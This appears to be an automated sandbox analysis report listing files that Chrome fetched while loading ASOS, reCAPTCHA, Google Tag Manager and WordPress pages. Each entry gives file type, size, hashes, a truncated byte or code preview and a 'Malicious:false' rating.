                                                                                                                                                                                                                                                                  Preview:/*! v1.12.3, license file: jquery.LICENSE.txt */.!function(){"use strict";var e,t;e=window,t=function(e,t){var n=[],r=e.document,i=n.slice,o=n.concat,a=n.push,s=n.indexOf,u={},l=u.toString,c=u.hasOwnProperty,f={},d=function(e,t){return new d.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,h=/^-ms-/,g=/-([\da-z])/gi,m=function(e,t){return t.toUpperCase()};function v(e){var t=!!e&&"length"in e&&e.length,n=d.type(e);return"function"!==n&&!d.isWindow(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}d.fn=d.prototype={jquery:"1.12.3",constructor:d,selector:"",length:0,toArray:function(){return i.call(this)},get:function(e){return null!=e?e<0?this[e+this.length]:this[e]:i.call(this)},pushStack:function(e){var t=d.merge(this.constructor(),e);return t.prevObject=this,t.context=this.context,t},each:function(e){return d.each(this,e)},map:function(e){return this.pushStack(d.map(this,(function(t,n){return e.call(t,n,t)})))},slice:function(){return this.pushStack(i.apply(this,argumen
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2861
                                                                                                                                                                                                                                                                  Entropy (8bit):7.899673741861986
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:6iEECouYVFJ+3dAYolftq+1AMmwIT9RlUg4NiQwCAtm2Pj/9T9Z+BLwYaVulsnM+:6igHYvYolR1DdIT9RugWiQwCAp99iaVZ
                                                                                                                                                                                                                                                                  MD5:7F0979E9A0C7CCD8B56C28C8EBA3AC03
                                                                                                                                                                                                                                                                  SHA1:609FC9759AC7C45DFFE5A5187B291733A4CF801B
                                                                                                                                                                                                                                                                  SHA-256:EFAEE361B8631ED1213F9795579DB451DA689380A4ACA4A741EBDC6F2F9C6499
                                                                                                                                                                                                                                                                  SHA-512:16EF664F0E787A0CA5D0FE35B4C6DB3350919AA28DCC87C26BF18210B6B6E56A07CFC2138427535CCD00D70E14F99585870FE0359BD832F51FD36C476F17EBF7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/fr.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx...o.G......1i.@h .C.....=...D.q.H..?..z..N......'.*..]+].S.,.?.T..A.^A.J9J.D..............{....:v^l.ewg.m?yf..gf...C...Zb..:>.p...T*.PQ./.M.(..b.[.Vq.l.G.....v..........f...=88.#..lgx.....+...Wc............../6[.UV..............^.,..._.<..1.r:...p8H.$b..g.UU.8.8'.Ib.H$.9....'.x!..........^.Y..fCU.b......s..7...w..\/2W=jjj...Fb..B..z.\.h......Q. ...-...J..-....:..>..E..n...{l...r2|.4..e..?_...fq@.f.A:GFF.q.Wo...d.|...R.;.ti.p..RQ.....n9..GS.N.."...h./?..EP...O....w3..LqJ.b.....7.w...4uH...=]...K..@O2.....p..js..f..(.....&.0)4D.v..y...>.U.....*.|O.....2.k.}..x....Tl.......Y..Wn....%+=K.ZDv.".Qj.-...5.}.....p...k6..'...H.T?...i.*...j..kc.v.~An.1......?:O.{4..0..da..p...5.....,.. QH....U.......%...Vy....../\.M..)y.._|...../.Tb3.9=mB..\.4.c...!u...~q.^|..2....m.......j.....n...<.Mx.We@t1.8..7(t.*..UJ.....EB.>..T...\....\.%^Jy+...=...=|.I...g.H.!.h...:<..Y..{g...%..%Q..G..F....mC#.N.W...E..-...'e..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (56943)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):57014
                                                                                                                                                                                                                                                                  Entropy (8bit):5.378838470596009
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:LfV8BFuXNhsWi6Ns8gMoqpfwTr6TdShTdDggwLYWrxj5+xjH+HAF1riaj14:6ksBEsComf6r6TdShTJggwLYWrxj5+xY
                                                                                                                                                                                                                                                                  MD5:168008A26F9E32C4FC5449BAABBB8924
                                                                                                                                                                                                                                                                  SHA1:021F48E00109F931F930042B0CC75732DE23AF16
                                                                                                                                                                                                                                                                  SHA-256:194B419E7C48A7893691594652358A8F3029B71BC083FCB59DF98811ECEA4994
                                                                                                                                                                                                                                                                  SHA-512:8CBD7C613D81965C91F0BE2ED9EE689B64864E26C93DDB28E88B060654BA03FE45EA7AC928F8D8ADDCA2146BF975EB45FD345F32AA465F886E628B2A67BB212D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e,t={76140:(e,t,n)=>{var r=n(60141);function i(e,t){!function(e,t){if(t.has(e))throw new TypeError("Cannot initialize the same private elements twice on an object")}(e,t),t.add(e)}function o(e,t,n){if(!t.has(e))throw new TypeError("attempted to get private field on non-instance");return n}function a(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function s(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?a(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):a(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}n(93085),function(e,t){var n,a,c;if(/\.asos\.com$/i.test(e)&&!/local/i.test(e)?n="prod":(/\.asosservices\.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):26915
                                                                                                                                                                                                                                                                  Entropy (8bit):7.969433396005976
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:a+SnI4N2GMhD0ebpZg8PPN4EH7N6t4ZkfSMjyVU5Y:a+x4cGMhwgg8n9bUOkK8Y
                                                                                                                                                                                                                                                                  MD5:C8B1329A6A8C06303C0354F4BCB04950
                                                                                                                                                                                                                                                                  SHA1:FDAD60184CE1D32004F0BA83BE2CDE2659AC5F4F
                                                                                                                                                                                                                                                                  SHA-256:ABE964CCE8F0A4FB0989940BA63162F16FC6F5BF83026B182BCBE7C347A999DE
                                                                                                                                                                                                                                                                  SHA-512:F89A4C553BA4CBE294C16F7BF709F44F1195E2B78AAC25F539A530FC3C843790652D94C0C82496BF9073A01F0DFDA70285F78AA8FD12B98000A481899C774E42
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6ybvhC6a36EKdcCTGBHKZReYQA4R_kkyWNSJTDAm7m3lFMEhYkCENSDziHiW9sRhbOJ86_Rsz2zmABWs2jn-El121Z6wW8aDnqJ4qjwO5ZcN3u6_Qzb1T_FqjH0O-Yzag-DOjDPnlRhcPtZhGPXV1TKAg9b0B7NcFkz3bKVPSKNagZW5Tfeoh0tPt_RS9jsUxjM_M1IE9oo08LmfUhCYLue86Lrw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..*DGB...z.2.C.x...... ...Iaw.......O...8#<.....q......7..&n..(........u=.......i2...?..u...z.\.J.....v...?...,r.."8.V.>.x...B..&.Z.....v........d....h...D.T?d....h..H..k...9....../....m...W.....>.U...)..gj.H.q../..*...^..>_1_.2.~H...Pc.._=)L^...C..-.yus..{A...1.<.j."..y^..r.|.<...{R.^.{P.(.Ty~.{.........w...Z.y/,....9.U..q\F...f/.....`.|..yv.n.........{.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):15406
                                                                                                                                                                                                                                                                  Entropy (8bit):4.853942207900639
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:Ft/psWR6+yFGfemUReAriQWT7+7VilfBV:FMq6AfetQAOQvVilZ
                                                                                                                                                                                                                                                                  MD5:5A9933E343D1DDB7ED5772E63AF4F578
                                                                                                                                                                                                                                                                  SHA1:FE6E2E9B66974F706947E8A7026CBA192559516D
                                                                                                                                                                                                                                                                  SHA-256:5B658F5A51A2CC169E3C16DC091BBBB7817D244DE0D8559CC05182DC3FDF340D
                                                                                                                                                                                                                                                                  SHA-512:77994FB84AFC76FCA806FF99670EF858A688066DC3205723752A1D5BF4E56E7494E3ABB87883F72589EBECCFD6E5EF41FFCF6DEC9224177E31CDC1570F7E67FD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ..........................................[:5.X9..X8..Y8..Y8..X8..X9..W:5.........................U@..Y8..Y8..X8..X8..X8..X8..X8..X8..Y8..X9..N;..............b;..X9..X8..X8..u[..............uZ..Y9..X8..X9..U@..........X9..X8..[<............\<..[;..........\<..X8..Y8......[:5.Y8..Y9....q.........fH..Z:..........x....Y9..Y8..[:5.Z9..X8..w]....gJ..........~..uZ..........n....v\..X8..X9..X8..X8......iL........tZ............kO......iL......X8..X8..Y8..X8......\=..........Z:............Y9......dF......X8..Y8..Y8..X8......uZ........X8..o.........X8.......y......X8..Y8..X8..X8..............sX..X8..........eG..]>..............X8..X8..X9..X8..w]..........i..p..........w]...{..........y`..X8..X9..[:5.Y8..Y9......p..Z:..Z;..Z;..Z;..Y:..|c..........Y9..Y8..W:5.....Y8..X8..\<......hL..[;..[;..hL......\<..X8..X9..........U@..X9..X8..Y9..y`..................v\..Y9..X8..X9..b;..............b
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2893
                                                                                                                                                                                                                                                                  Entropy (8bit):7.912925986158937
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:03cQdRHChzFYMl4FTpjPKEKTjdaLcI5G/60saAdikLRfJzVVwwYyaKxMdNzxzSFL:fQ+hz+Ml4TlKndatStHA8qBhVww3Md5s
                                                                                                                                                                                                                                                                  MD5:C9D346C188F3406F1EDE034E90D5B5C1
                                                                                                                                                                                                                                                                  SHA1:2EFC812A53CC7D79C9D64E309C4673D0067C07D1
                                                                                                                                                                                                                                                                  SHA-256:C89F0F5DCDE39CA9E55FEA4859DE4FB69DDEEF96E935A59229899CACBDC633C6
                                                                                                                                                                                                                                                                  SHA-512:43C0B13A21A94D5A8B81AF217B3675AC52D277A036DF03CBFCAB13E8D74EB784537F7A5311F0F71A248B3350E95DD2C3AF88D94191F519105162E28B0028799C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/it.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..[l......_../`7.C.L ..T$...DB...).1.J..U.Z...>....V.".@T.T.E&"-Q.RJ($......X.{.......Yv....w....i<3.:..w.w.w.5.<.`0....6..#..w..,.N.q..........h...d...l.v.];.z<...z...,.....wD"...o;.[.~5=..U..u...t:.:::.._.q.WM._.C............^.,..._....1..Z..l.XH.$b..g.U..8.8'.Ib.H$.9.....e.tA..{...}..k.d ..\..]...]....#...`..{o.n...\.....\..... i....%...0MNN.7..,.n..m....Q..L".P......}..[..$C.JZ..........*.H.\:H.......$.2.ax1... .N....:<H]..|...Q..W...<.d6...J...g(.:<n.Y.Z.to.qJQ.2..A....g.}y....4...,t...X......B{...^+..f...BQf.....4.....v.R..9Zw.[d;........TCZ...Gv..ph._.hj.A2.u....9x.._..n2..F.d.+. .{nQ......Z.5@n.,.~..72.9.*....hw..m}........A......e". .O..3.*.T..tqf.p..;[.|9r1...@......$.g..t.5g~...r..iD...O...o.K..)..7~.w.S.#...y.d...).n6..g.H.J....R6..g...}...n{......e%.^.E.xFk].P..].....hc.qR....k...j2.. $or4|^..F...K...6..q.u1B~...(...9_.$VD.m^p$tV.g.9....]..\.K`.K.....g+m.g..m.` z:Wm....J.9).\..<H
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2941
                                                                                                                                                                                                                                                                  Entropy (8bit):7.909276343163651
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cYg3H1ESrRSL18k5JBbuRdf5wMO1olTpQG6Fq7Y+tEQz8eyZIz071:Jg3VESQek5JBWfwDYSFIOQz8G0x
                                                                                                                                                                                                                                                                  MD5:3B3B7074D0DDCB23F3252C28322A4209
                                                                                                                                                                                                                                                                  SHA1:27D894D07D5B998D8237D676A6C7B7D10FD0C192
                                                                                                                                                                                                                                                                  SHA-256:E45294734EFD85FDC485835B30C844B6F40AF18A9C9B86D150F465880FF01FC0
                                                                                                                                                                                                                                                                  SHA-512:99234E4F3E0681A657E07DA46221982C48E16CFE2485F21D34F5CD0F3EDE1910B6742075E63CE8D24ADC825E107346E4975D53FF4E00CCB7997D72811D305196
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........7IDATx..{.T....=..swv..e..Pu5YP.AM......L.....6$.6.1..1..mj...Hi.15i...M..? .`...4..B.M.."..y.}..=.g...3.b.!3..s~......~..Eas....P.D.\.W.^.zu..5...d,b.v....BBQ..JG.)_..>..|.o..mA........f.[..K..lC.f6.9k.}Yf....6cu......|...AM._.l9...3.....i$Y.....n.0r;...n..Y..p.c.Q.q..Fq...#..b6.c..t:.'.9.rV..D+..i.#?...;d.(6cA....x..K.W.....Mf.....M..,H....q=.".9..%...dy..2.E.....<..Lo..h...`:...K.g.V7DH.....kdi.D..%..............l..........5...A.w7Z...%ha.G]I(3[_4t.4A.#......r\..yv..jGC....uw.gs......p.uX...|.i..4.L..s...Ph...._......_..9l.dl.(..(..e..........=r..u..]....F.......v...^.?a.w...1.g.E.s.,>b.E.F;............{Z..D....=.....h......\....$G uq. ..mY..&..Z.T3.Wc.}n.......];U?...-..I...._......`...R..........S7X.....i3.,.E......N.12..s.[.<.k....u......5v..{...Z....=s"g.x..1.j........].j1..Jx]w.<.b0.......:..5...l...c..-,......t.n...Bg.^..UG.G....el..D.,.1...@....hr!g..\r4.V..Je
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3501
                                                                                                                                                                                                                                                                  Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                  MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                  SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                  SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                  SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fwww.asos.com
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3881
                                                                                                                                                                                                                                                                  Entropy (8bit):7.882941860766316
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:yE04zOQKzENkreohc41EBarCNjKcsd3Pz0bKzW:ydWjKoohcbYmkcsVPz29
                                                                                                                                                                                                                                                                  MD5:75EF1E9F490A443C61B11C2F30EE5709
                                                                                                                                                                                                                                                                  SHA1:55AE89CEE6ADDB717B26DFDB2B25D04F043BF497
                                                                                                                                                                                                                                                                  SHA-256:4C731783108A5BFDB6E20A2FE24953816B66FE5431D6C20C2C50C7CD30CCE4BA
                                                                                                                                                                                                                                                                  SHA-512:0948458548F0DDEB3EAA9E496CBD83CB9067F6BD72E40ED5D67CE1076C74558FCCA41F01B3CBF806085F7F182B4646F6EE5A68B74F66ECB1BBA8D4EA01503717
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.._..,..\4r4...\q...Zf.p.....hT....E....c<z.e.y-l.X.D.(..2.s.......J..%.#.c.?w...N.x.U.[.rz..6Vl./uw......Dv+.. w....cU.D.F.s.C.$..g..U..Ho...{...U...w.3...=.....i$.....I...p8+.=.U..j*.JN...u..._j..9.,...01.k..e...p8.L..VR...c#..R.......b...H$..(.....T.iV.|.nc.l.D*..I.g..#...;sB..BE..Km..M..\.....!X....N).>?...<.[.JcT..... ...~n....G.I....M*........8<.>..j>*
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                                                                                                  Entropy (8bit):7.2576396280117494
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                                                                                                                                                                                                                                                  MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                                                                                                                                                                                                                  SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                                                                                                                                                                                                                  SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                                                                                                                                                                                                                  SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/api2/audio_2x.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1366
                                                                                                                                                                                                                                                                  Entropy (8bit):7.806141995372328
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:FUM0V++zM7Qo9WEZz6k8OOHzTjtOHFzM6/x+uNwKBaOBilXWBVAU3jcIv9kn:B2zM7Qo9WJOAtyFTJQuaOBilU3jtin
                                                                                                                                                                                                                                                                  MD5:F05CC8F747EAB90ADFEFE0B716A5E495
                                                                                                                                                                                                                                                                  SHA1:E105ED264991B76DF25B9CC32BA8BEDD856C9EA4
                                                                                                                                                                                                                                                                  SHA-256:3D37E4A8B1D19810A488887036F55BEE2722B3181CC12CDBCCFC091BDB6EE73F
                                                                                                                                                                                                                                                                  SHA-512:BEC0927D40C0676730D099B912470C22564BCA6216BD8C64ECEE31677D2BB44A0BEDA59FEFDF5E11D7FDC82D4242B844A209DD95839E53D33E4833AC9C499514
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://fqr44.wordpress.com/wp-content/uploads/2024/09/pdf-image.png?w=204
                                                                                                                                                                                                                                                                  Preview:RIFFN...WEBPVP8LA.../../.....$E{..".1.....$)R..D.....O..F....3.x.......Y........KP..wyA.[/..9q..9..f..D........`.t.....Y).......P......_...2.5..S5..R.J..0X..<.@..6...l.)r.....R....#H.X.<........M~..OJ./.....t.....S.T....S.~..s........u.....3.<H......#3?._..8..~s..Mz.9@x...............4$..,$.<$.."$..2$.......R.......z...wP._*$..8$..$$.{...=...(BB.(BB./CB....g....{.....9..KZ.}.n....[.My..........o@||8.....g.s.....{.&U@.yP.!.uP.....`P..s...[n........ I;.....H....Y..r......z{.i..W...`<...G..FL*W.K...(.O..-lbi7..l..Z!..{..m....+.l..t.......y1"...O!"Y....D..|...>z.H...CT..}C...."....I..ID-A...4"K.7d...xGt..Hv.oH..#..=q..Y....<...S..>.q.....T=...^fG...U......]...f..h..$..i..'h....s=Hr...[Z..Q.W.2...Vh... .I4A.x.$.Y2C+..-.}e ....Il$..i.65)@7.b.....Ca....Q.%St.P)..q...&2.;n...\BeT..nl.u.{.|.sHM.9:nd.w....I.U.qki"cv\....).hD...MjR.N!2.U<Y=...BT.@Up,3..l...r..a4s.4j\._..e..IC.z]..i..q...T&...y].b>..^.-q...y.Db1.].u[.s.w....t.3:xDC8...g...=.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2231
                                                                                                                                                                                                                                                                  Entropy (8bit):7.877156371855539
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:NmntJOd/sFwn+HuC+qdNnP3hNuGBsihbtiRr/jsjD4FnXV6oHSSYxI3u:8E/0iC+8nPvScsRr7MsdSSYxI3u
                                                                                                                                                                                                                                                                  MD5:3DB9E52F0236368C12A29D95BC940531
                                                                                                                                                                                                                                                                  SHA1:DEA098ED21582C63B8828A7EA8201F946843F6EC
                                                                                                                                                                                                                                                                  SHA-256:C13E7E8FC0A40CDBFD2FE608AC748EF21CB6DEFFFABBB61F80BDC90AC4492096
                                                                                                                                                                                                                                                                  SHA-512:8EFB65F053679C960CD8A34F46B53D8F113F251F920DC82F5D40779A65C91E5D245A3F6824A1AF0F9351E90D95AD3218E72C8348D40D28CCCD67FA7492F036DD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........qIDATx...o.E....8.=.I/i.."."..@QT..(.U.+U...*!....x...\!A..R.Q$....(i.&i.I..I.;..^.o.q7N|....9........|fg....4p...=.m.t.A9I>..rz.C.~.'..r..n.,.....c.}....Y...6...%#.t..:.2+..IE.h.m....-.Nl..'...;.,..6.....`.~.:...,C_.'.m_.9..$.n..-..}.w..=..5.c....zp.P<..Y*"x.C...=.+.|.Ut.X......qk...+..~...+....&w...a.l.Q..k...a..?l..;".vJ.......x>.......`.D.P.4a$.Ju...2;_...j...a{^r...uH....mI'_U.;.L@r-..mm..io.+.\.EN..E...z...8..MJ....L6..U.L....).u&.no..w..}?fm.PK...3.8......x..$<Ag..l.(!F.Dz.....&..z.....~#.uf...Y8...id...-....0.......'w@$1..)r.....@b....@.+...7.v,S..2\d.A.......3T.......iN;......]<.l....,.p....8%.8.4...`.{..Eu..q.Ls.,...3u..5.)v.h*..f......N.P...4J.{.._)....X..............T..S...._.LC=.LA@...q.."M..*2S\#....+.Syk....~24R.I....(i.0Vn....+.S#._...\.......i....u.7)..V:.rf...?b....l..X.T.:.h.W.z$X..j"E.@D\.dG@..;...s.,.......hV...?...t.......F../..J......yG2.:....=.`...>.Q@m..2....NeX......Nm.G/y,.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1038)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1127
                                                                                                                                                                                                                                                                  Entropy (8bit):5.348239999385878
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:+cKBOSCtD1XwsZqIx7tK988dirEvW0NVy2hdp:+l0SCXqIxt98dirEvW0NVy2Lp
                                                                                                                                                                                                                                                                  MD5:7F3A6A3D7F495B63DCB141D50B82F200
                                                                                                                                                                                                                                                                  SHA1:4DDC1B543B837EF71AC8E9E267EE401CD94ECB16
                                                                                                                                                                                                                                                                  SHA-256:8C14BC742C4B9E6B024585FF5EA867778291163C42D4476206EBD86CC44EAE3E
                                                                                                                                                                                                                                                                  SHA-512:71F6764EDF5B8BF7E2903B8AFE48B473AB044450E3D65C8690F07882E019AA7AAF1631569290DEE0D5E62E9AABCE0D3AB4B5D4E7CB9C6186F4BC268A3477ED8D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/shared/uuid.76892287.js
